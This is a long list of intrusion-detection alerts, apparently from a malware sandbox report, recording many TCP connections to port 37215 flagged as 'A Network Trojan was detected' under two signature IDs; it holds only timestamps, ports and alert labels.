            Timestamp:05/28/24-09:57:29.995551
            SID:2835222
            Source Port:36214
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809352
            SID:2835222
            Source Port:41928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.559827
            SID:2829579
            Source Port:37230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.560048
            SID:2835222
            Source Port:37982
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.828933
            SID:2829579
            Source Port:43808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.805451
            SID:2835222
            Source Port:59922
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.863159
            SID:2829579
            Source Port:55926
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.553090
            SID:2829579
            Source Port:54096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.376421
            SID:2829579
            Source Port:46686
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507683
            SID:2835222
            Source Port:34030
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.520890
            SID:2835222
            Source Port:40652
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809105
            SID:2829579
            Source Port:34260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.444093
            SID:2835222
            Source Port:36948
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.946734
            SID:2829579
            Source Port:33634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.851287
            SID:2835222
            Source Port:50842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.935087
            SID:2829579
            Source Port:48758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.276211
            SID:2835222
            Source Port:37602
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.042586
            SID:2829579
            Source Port:33876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:48.631849
            SID:2829579
            Source Port:54770
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.704975
            SID:2829579
            Source Port:59228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.943674
            SID:2835222
            Source Port:60902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.835884
            SID:2835222
            Source Port:53816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.231279
            SID:2835222
            Source Port:59076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.640571
            SID:2835222
            Source Port:49238
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.550418
            SID:2829579
            Source Port:36802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.778364
            SID:2835222
            Source Port:57714
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.861995
            SID:2835222
            Source Port:34332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989681
            SID:2829579
            Source Port:55628
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.064780
            SID:2835222
            Source Port:55532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.445001
            SID:2835222
            Source Port:41820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.069808
            SID:2835222
            Source Port:43284
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.811304
            SID:2835222
            Source Port:33048
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.734333
            SID:2835222
            Source Port:43652
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.646717
            SID:2835222
            Source Port:49648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.865958
            SID:2835222
            Source Port:44886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.808072
            SID:2835222
            Source Port:50352
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.384752
            SID:2829579
            Source Port:48742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.934181
            SID:2835222
            Source Port:43368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989811
            SID:2835222
            Source Port:52174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.055128
            SID:2835222
            Source Port:51644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.755972
            SID:2835222
            Source Port:49988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.760004
            SID:2835222
            Source Port:55078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.850400
            SID:2835222
            Source Port:45110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.847289
            SID:2829579
            Source Port:43522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.045465
            SID:2829579
            Source Port:40758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.668999
            SID:2829579
            Source Port:52544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:49.617866
            SID:2835222
            Source Port:37636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840105
            SID:2829579
            Source Port:49022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.152876
            SID:2829579
            Source Port:36504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.818242
            SID:2829579
            Source Port:53732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.015476
            SID:2835222
            Source Port:34006
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.852821
            SID:2835222
            Source Port:59138
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.349214
            SID:2835222
            Source Port:49124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.009328
            SID:2829579
            Source Port:33176
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.772893
            SID:2835222
            Source Port:40706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.901385
            SID:2829579
            Source Port:56002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.741579
            SID:2835222
            Source Port:60762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.670293
            SID:2829579
            Source Port:60648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.941636
            SID:2835222
            Source Port:53508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776284
            SID:2829579
            Source Port:55106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.717543
            SID:2829579
            Source Port:47318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.040245
            SID:2835222
            Source Port:48444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.899607
            SID:2829579
            Source Port:56206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.946826
            SID:2829579
            Source Port:49806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.778271
            SID:2829579
            Source Port:48346
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.298635
            SID:2835222
            Source Port:54398
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.805074
            SID:2829579
            Source Port:40624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.779046
            SID:2835222
            Source Port:50098
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.388658
            SID:2829579
            Source Port:50874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.927661
            SID:2835222
            Source Port:56470
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.278105
            SID:2829579
            Source Port:49276
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.807254
            SID:2829579
            Source Port:60112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869842
            SID:2829579
            Source Port:41998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.759990
            SID:2829579
            Source Port:34582
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.279568
            SID:2829579
            Source Port:56896
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.880763
            SID:2835222
            Source Port:45788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.597311
            SID:2829579
            Source Port:40716
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.880042
            SID:2829579
            Source Port:55410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:16.994723
            SID:2835222
            Source Port:47820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.525846
            SID:2829579
            Source Port:48466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.525941
            SID:2829579
            Source Port:34286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.034857
            SID:2835222
            Source Port:51184
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.893360
            SID:2835222
            Source Port:42202
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.790323
            SID:2835222
            Source Port:40702
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.874265
            SID:2835222
            Source Port:41224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.559976
            SID:2829579
            Source Port:40872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.459779
            SID:2835222
            Source Port:50676
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.318127
            SID:2829579
            Source Port:37436
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.810404
            SID:2835222
            Source Port:33324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.433413
            SID:2829579
            Source Port:54670
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.408793
            SID:2835222
            Source Port:38620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:46.563410
            SID:2835222
            Source Port:51098
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.823601
            SID:2835222
            Source Port:48540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.665819
            SID:2829579
            Source Port:40016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.820604
            SID:2835222
            Source Port:42780
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.064559
            SID:2829579
            Source Port:44018
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.508088
            SID:2835222
            Source Port:60844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.810533
            SID:2835222
            Source Port:45310
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754969
            SID:2835222
            Source Port:33042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.881939
            SID:2829579
            Source Port:57048
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.054317
            SID:2835222
            Source Port:47718
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.518678
            SID:2829579
            Source Port:38606
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.486865
            SID:2829579
            Source Port:60872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.768004
            SID:2835222
            Source Port:59542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869367
            SID:2835222
            Source Port:44350
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.433012
            SID:2829579
            Source Port:54670
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.398409
            SID:2829579
            Source Port:58724
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.909883
            SID:2829579
            Source Port:42718
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.864914
            SID:2829579
            Source Port:60980
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919615
            SID:2835222
            Source Port:36448
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767215
            SID:2829579
            Source Port:55870
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.722324
            SID:2829579
            Source Port:53690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.352165
            SID:2835222
            Source Port:37888
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.701967
            SID:2835222
            Source Port:48510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.051125
            SID:2829579
            Source Port:46570
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.885020
            SID:2835222
            Source Port:32822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.929146
            SID:2829579
            Source Port:49168
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.788955
            SID:2829579
            Source Port:39214
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.426846
            SID:2835222
            Source Port:41580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.934115
            SID:2835222
            Source Port:35462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.537090
            SID:2829579
            Source Port:34806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.411906
            SID:2835222
            Source Port:60408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.097154
            SID:2829579
            Source Port:35666
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.745419
            SID:2829579
            Source Port:52986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.867944
            SID:2829579
            Source Port:46634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.767734
            SID:2835222
            Source Port:58114
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.524520
            SID:2835222
            Source Port:54404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.062960
            SID:2835222
            Source Port:56538
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.057806
            SID:2829579
            Source Port:43806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.714383
            SID:2835222
            Source Port:58372
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.879532
            SID:2829579
            Source Port:48718
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.458360
            SID:2829579
            Source Port:46020
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.512874
            SID:2829579
            Source Port:45464
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.963262
            SID:2835222
            Source Port:43666
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.922712
            SID:2829579
            Source Port:55544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.289604
            SID:2829579
            Source Port:45886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.107933
            SID:2835222
            Source Port:40134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.858030
            SID:2829579
            Source Port:43052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.969538
            SID:2829579
            Source Port:51704
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.656212
            SID:2835222
            Source Port:48712
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.767077
            SID:2829579
            Source Port:60858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046595
            SID:2835222
            Source Port:43434
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:38.486801
            SID:2829579
            Source Port:58086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.005946
            SID:2829579
            Source Port:55446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.917232
            SID:2829579
            Source Port:52806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.651448
            SID:2829579
            Source Port:52674
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.723362
            SID:2829579
            Source Port:43228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.930904
            SID:2829579
            Source Port:39066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.958554
            SID:2829579
            Source Port:60382
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.547901
            SID:2835222
            Source Port:52662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046101
            SID:2829579
            Source Port:40912
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.929452
            SID:2835222
            Source Port:36000
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.350247
            SID:2835222
            Source Port:42712
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.062213
            SID:2829579
            Source Port:55666
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.490984
            SID:2829579
            Source Port:42524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.779997
            SID:2829579
            Source Port:50652
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.778739
            SID:2829579
            Source Port:35964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.900864
            SID:2835222
            Source Port:59102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.809213
            SID:2829579
            Source Port:47352
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.400306
            SID:2835222
            Source Port:60952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.421351
            SID:2829579
            Source Port:40246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.828084
            SID:2829579
            Source Port:42692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.912076
            SID:2835222
            Source Port:54904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.302087
            SID:2835222
            Source Port:37212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.778386
            SID:2829579
            Source Port:36700
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922246
            SID:2829579
            Source Port:42174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.996003
            SID:2835222
            Source Port:60830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.820738
            SID:2835222
            Source Port:44970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.084489
            SID:2835222
            Source Port:52274
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.915907
            SID:2835222
            Source Port:36448
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.597574
            SID:2829579
            Source Port:45204
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.903773
            SID:2835222
            Source Port:52552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.775428
            SID:2835222
            Source Port:46988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.523748
            SID:2829579
            Source Port:45062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.524380
            SID:2835222
            Source Port:49306
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.180621
            SID:2829579
            Source Port:47222
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.818897
            SID:2829579
            Source Port:34746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.084545
            SID:2829579
            Source Port:59778
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046530
            SID:2835222
            Source Port:55970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.714794
            SID:2835222
            Source Port:52072
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.532245
            SID:2835222
            Source Port:47918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.058051
            SID:2835222
            Source Port:44318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.054080
            SID:2829579
            Source Port:49934
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.298554
            SID:2829579
            Source Port:44006
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.442547
            SID:2835222
            Source Port:48388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.670340
            SID:2829579
            Source Port:36664
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.893823
            SID:2829579
            Source Port:58716
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.806619
            SID:2835222
            Source Port:56248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.473491
            SID:2829579
            Source Port:34788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:46.563357
            SID:2835222
            Source Port:36988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.742324
            SID:2829579
            Source Port:36884
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.953547
            SID:2829579
            Source Port:34458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.299305
            SID:2829579
            Source Port:60500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.910812
            SID:2835222
            Source Port:58198
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.446766
            SID:2835222
            Source Port:59824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.614997
            SID:2829579
            Source Port:38554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.309501
            SID:2829579
            Source Port:56728
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.871091
